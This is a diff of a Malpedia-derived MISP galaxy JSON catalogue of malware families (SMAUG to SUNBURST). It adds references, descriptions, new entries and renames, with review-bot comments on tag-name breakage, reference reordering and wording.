@@ -28509,10 +32519,13 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager",
 "https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4",
 "https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html",
 "https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214",
 "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1",
 "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html",
+ "https://blog.group-ib.com/task",
+ "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
 "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
 "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html",
 "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/"
@@ -28539,39 +32552,48 @@
 "value": "SmartEyes"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug",
 "https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service",
- "https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/"
+ "https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html"
 ],
 "synonyms": [],
 "type": []
 },
 "uuid": "b81cbf03-8909-4833-badf-4df32c9bf6cb",
- "value": "SMAUG Ransomware"
+ "value": "SMAUG"
 },
 {
 "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. 
Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader",
+ "https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
 "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
 "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/",
 "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign",
 "https://research.checkpoint.com/2019-resurgence-of-smokeloader/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
 "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe",
 "https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/",
+ "http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html",
 "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/",
 "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/",
+ "https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
 "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
- "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait",
+ "http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html",
 "https://hatching.io/blog/tt-2020-08-27/",
 "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
 "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886",
@@ -28580,6 +32602,7 @@
 "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/",
 "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis",
 "https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/",
+ "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait",
 "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
 "http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html",
 "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries",
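Review bot: The `value` change from `"SMAUG Ransomware"` to `"SMAUG"` changes the tag string MISP derives from this cluster (`misp-galaxy:malpedia="SMAUG Ransomware"` becomes `misp-galaxy:malpedia="SMAUG"`), so events already tagged with the old name only keep resolving to this cluster if the galaxy update path renames existing tags, which is worth verifying; the uuid is unchanged but tag matching is by string. The same rename is made for Smrss32 (hunks -28619/-28630), Snake (-28679) and STOP (-29346). Keeping the old display name as a synonym preserves search and correlation: `"synonyms": [` `"SMAUG Ransomware"` `],`. For Snake in particular the bare name is also a widely used alias of Turla's Uroburos implant, so if that cluster (outside this chunk) lists `Snake` as a value or synonym the shortened name becomes ambiguous.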
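Review bot: The int0xcc.svbtle.com reference added here is the one removed in the preceding hunk, so the net change for that entry is a move rather than an addition; the same move-only churn makes up most of the Snake hunk at -28650 and recurs for the Microsoft link in SpyEye (-29110), artemonsecurity in Stuxnet (-29411), 4hou in SUNBURST (-29484/-29567), accenture in SunCrypt (-29598) and trendmicro in SuperNova (-29632). The order of `refs` carries no meaning in this format, so having the exporter emit the list in a stable order (sorted, or insertion order preserved from the previous revision) would keep future syncs down to the references that actually changed and make a diff of this size reviewable.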
@@ -28587,9 +32610,11 @@
 "https://www.cert.pl/en/news/single/dissecting-smoke-loader/",
 "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
 "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
 "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/",
 "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
- "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/"
+ "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/",
+ "https://x0r19x91.in/malware-analysis/smokeloader/"
 ],
 "synonyms": [
 "Dofoil",
@@ -28619,7 +32644,7 @@
 "value": "Smominru"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.smrss32",
@@ -28630,7 +32655,7 @@
 "type": []
 },
 "uuid": "1fe0b2fe-5f9b-4359-b362-be611537442a",
- "value": "Smrss32 Ransomware"
+ "value": "Smrss32"
 },
 {
 "description": "",
@@ -28650,27 +32675,29 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.snake",
- "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems",
- "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/",
- "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/",
- "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf",
- "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/",
- "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/",
 "https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware",
- "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html",
+ "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/",
+ "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/",
 "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md",
 "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
- "https://twitter.com/bad_packets/status/1270957214300135426",
 "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html",
+ "https://www.goggleheadedhacker.com/blog/post/22",
+ "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/",
+ "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/",
 "https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/",
- "https://twitter.com/milkr3am/status/1270019326976786432",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html",
+ "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/",
 "https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017",
- "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/"
+ "https://twitter.com/bad_packets/status/1270957214300135426",
+ "https://twitter.com/milkr3am/status/1270019326976786432"
 ],
 "synonyms": [
 "EKANS",
@@ -28679,7 +32706,7 @@
 "type": []
 },
 "uuid": "547deef9-67c3-483e-933d-171ee8b6b918",
- "value": "Snake Ransomware"
+ "value": "Snake"
 },
 {
 "description": "Snatch is a ransomware which infects victims by rebooting the PC into Safe Mode. Most of the existing security protections do not run in Safe Mode so that it the malware can act without expected countermeasures and it can encrypt as many files as it finds. It uses common packers such as UPX to hide its payload.",
@@ -28687,8 +32714,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch",
 "https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/",
+ "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
 "https://thedfirreport.com/2020/06/21/snatch-ransomware/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md",
 "https://twitter.com/VK_Intel/status/1191414501297528832"
@@ -28737,6 +32766,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula",
 "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf",
+ "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/",
 "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html"
 ],
 "synonyms": [
@@ -28806,6 +32838,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars",
 "https://twitter.com/VK_Intel/status/1201584107928653824",
+ "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/"
 ],
@@ -28847,10 +32880,11 @@
 "value": "SocksBot"
 },
 {
- "description": "",
+ "description": "This is a RAT that is usually loaded with one or more shellcode and/or reflective DLL injection techniques. The RAT uses RC4 or a hardcoded RSA key for traffic encryption/decryption. Its communication can either happen via a raw TCP socket or a HTTP POST request. Depending on the version, the RAT may remotely execute DLLs or shellcode.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
 "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf"
 ],
 "synonyms": [
@@ -28885,9 +32919,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker",
- "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/"
+ "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer",
+ "https://www.binarydefense.com/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/",
+ "https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html",
+ "https://twitter.com/MsftSecIntel/status/1403461397283950597",
+ "https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire",
+ "https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more",
+ "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/",
+ "https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1/"
+ ],
+ "synonyms": [
+ "Jupyter",
+ "Polazert",
+ "Yellow Cockatoo"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "4e08d816-9fe3-42ae-b7e4-f7182445f304",
@@ -28898,6 +32943,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat",
+ "https://blogs.blackberry.com/en/2021/05/threat-thursday-sombrat-always-leave-yourself-a-backdoor",
 "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced"
 ],
 "synonyms": [],
@@ -29041,6 +33087,21 @@
 "uuid": "1937c3e0-569d-4eb4-b769-ae5d9cc27755",
 "value": "Sparksrv"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparrow_door",
+ "https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/"
+ ],
+ "synonyms": [
+ "FamousSparrow"
+ ],
+ "type": []
+ },
+ "uuid": "412a1b1b-77b1-4149-b7bd-14a43aa40dda",
+ "value": "SparrowDoor"
+ },
 {
 "description": "Spartacus is ransomware written in .NET and emerged in the first half of 2018. ",
 "meta": {
@@ -29110,20 +33171,39 @@
 "uuid": "34e9d701-22a1-4315-891d-443edd077abf",
 "value": "SpyBot"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder",
+ "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/",
+ "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
+ "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/",
+ "https://st.drweb.com/static/new-www/news/2021/march/BackDoor.Spyder.1_en.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bcee00e4-5316-45ad-8811-33c50b9394f8",
+ "value": "Spyder"
+ },
 {
 "description": "SpyEye is a malware targeting both Microsoft Windows browsers and Apple iOS Safari. Originated in Russia, it was available in dark forums for $500+ claiming to be the \"The Next Zeus Malware\". It performed many functionalities typical from bankers trojan such as keyloggers, auto-fill credit card modules, email backups, config files (encrypted), http access, Pop3 grabbers and FTP grabbers. 
SpyEye allowed hackers to steal money from online bank accounts and initiate transactions even while valid users are logged into their bank account.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye",
 "https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye",
 "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393",
 "https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/",
 "https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html",
 "https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/",
 "http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye",
- "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/"
+ "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/",
+ "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals"
 ],
 "synonyms": [],
 "type": []
@@ -29131,6 +33211,29 @@
 "uuid": "814fa0b7-0468-4ed0-b910-2b3caec96d44",
 "value": "SpyEye"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle",
+ "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf",
+ "https://www.malware-traffic-analysis.net/2021/09/17/index.html",
+ "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike",
+ "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/",
+ "https://www.cynet.com/understanding-squirrelwaffle/",
+ "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
+ "https://twitter.com/Max_Mal_/status/1442496131410190339",
+ "https://security-soup.net/squirrelwaffle-maldoc-analysis/",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/",
+ "https://www.youtube.com/watch?v=9X2P7aFKSw0"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cdbfd973-fa96-4e64-b2a3-9d51460fd7af",
+ "value": "Squirrelwaffle"
+ },
 {
 "description": "",
 "meta": {
@@ -29270,11 +33373,42 @@
 "uuid": "033dbef5-eb51-4f7b-87e6-6dc4bef72841",
 "value": "StartPage"
 },
+ {
+ "description": "Malware that abuses the Common Log File System (CLFS) to store/hide a second stage payload via registry transaction files.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stashlog",
+ "https://twitter.com/ESETresearch/status/1433819369784610828",
+ "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4a844c8c-996c-4562-bed4-0496d7838157",
+ "value": "STASHLOG"
+ },
+ {
+ "description": "This is a stealer used by LockBit 2.0.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit",
+ "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/",
+ "https://twitter.com/r3c0nst/status/1425875923606310913"
+ ],
+ "synonyms": [
+ "Corrempa"
+ ],
+ "type": []
+ },
+ "uuid": "b98c86d4-1eee-490e-a6f9-e9559322fec8",
+ "value": "StealBit"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker",
+ "https://www.bleepingcomputer.com/news/security/synology-warns-of-malware-infecting-nas-devices-with-ransomware/",
 "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/"
 ],
 "synonyms": [],
@@ -29283,6 +33417,19 @@
 "uuid": "d1c5a299-c072-44b5-be31-d03853bca5ea",
 "value": "StealthWorker Go"
 },
+ {
+ "description": "Malware written in .NET that hides in Steam profile pictures. Tries to evade virtualization through detection if it is executed within VMWare or VirtualBox.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.steamhide",
+ "https://www.gdatasoftware.com/blog/steamhide-malware-in-profile-images"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4729fb59-44a8-4d2f-9914-cd93fc528888",
+ "value": "SteamHide"
+ },
 {
 "description": "",
 "meta": {
@@ -29337,7 +33484,8 @@
 "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
 "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
 "https://securelist.com/keypass-ransomware/87412/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/"
 ],
 "synonyms": [
 "Djvu",
@@ -29346,7 +33494,7 @@
 "type": []
 },
 "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd",
- "value": "STOP Ransomware"
+ "value": "STOP"
 },
 {
 "description": "",
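Review bot: The new SteamHide description reads `Tries to evade virtualization through detection if it is executed within VMWare or VirtualBox.`, which inverts the relation between detection and evasion and leaves unclear what is being evaded; presumably the sample detects the hypervisor and changes its behaviour in response, rather than evading the virtualization itself. Suggested wording: `"description": "Malware written in .NET that hides in Steam profile pictures. It checks whether it is running inside VMware or VirtualBox and tries to evade analysis when it is."`. The vendor name is conventionally spelled `VMware`, not `VMWare`.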
@@ -29381,8 +33529,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity",
+ "https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara",
 "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity",
 "https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4",
 "https://twitter.com/physicaldrive0/status/786293008278970368",
 "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/",
@@ -29411,10 +33561,12 @@
 "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper",
 "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html",
+ "https://medium.com/s2wlab/w3-may-en-story-of-the-week-code-signing-certificate-on-the-darkweb-94c7ec437001",
 "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf",
 "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
 "https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html",
+ "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html",
 "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
 "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
 "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf"
@@ -29445,6 +33597,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst",
 "https://www.brighttalk.com/webcast/7451/462719",
+ "https://us-cert.cisa.gov/remediating-apt-compromised-networks",
 "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/",
 "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
 "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance",
@@ -29460,6 +33613,7 @@
 "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306",
 "https://www.brighttalk.com/webcast/7451/469525",
 "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf",
+ "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
 "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug",
 "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst",
 "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html",
@@ -29467,12 +33621,16 @@
 "https://netresec.com/?b=211f30f",
 "https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view",
 "https://github.com/sophos-cybersecurity/solarwinds-threathunt",
+ "https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities",
 "https://twitter.com/megabeets_/status/1339308801112027138",
+ "https://www.youtube.com/watch?v=GfbxHy6xnbA",
 "https://www.youtube.com/watch?v=cMauHTV-lJg",
 "https://twitter.com/0xrb/status/1339199268146442241",
 "https://netresec.com/?b=211cd21",
 "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards",
+ "https://www.youtube.com/watch?v=dV2QTLSecpc",
 "https://github.com/RedDrip7/SunBurst_DGA_Decode",
+ "https://youtu.be/SW8kVkwDOrc?t=24706",
 "https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution",
 "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714",
 "https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/",
@@ -29484,14 +33642,17 @@
 "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update",
 "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/",
 "https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f",
+ "https://github.com/cisagov/CHIRP",
 "https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q",
 "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/",
 "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html",
- "https://www.4hou.com/posts/KzZR",
+ "https://www.cisa.gov/supply-chain-compromise",
+ "https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/",
 "https://www.comae.com/posts/sunburst-memory-analysis/",
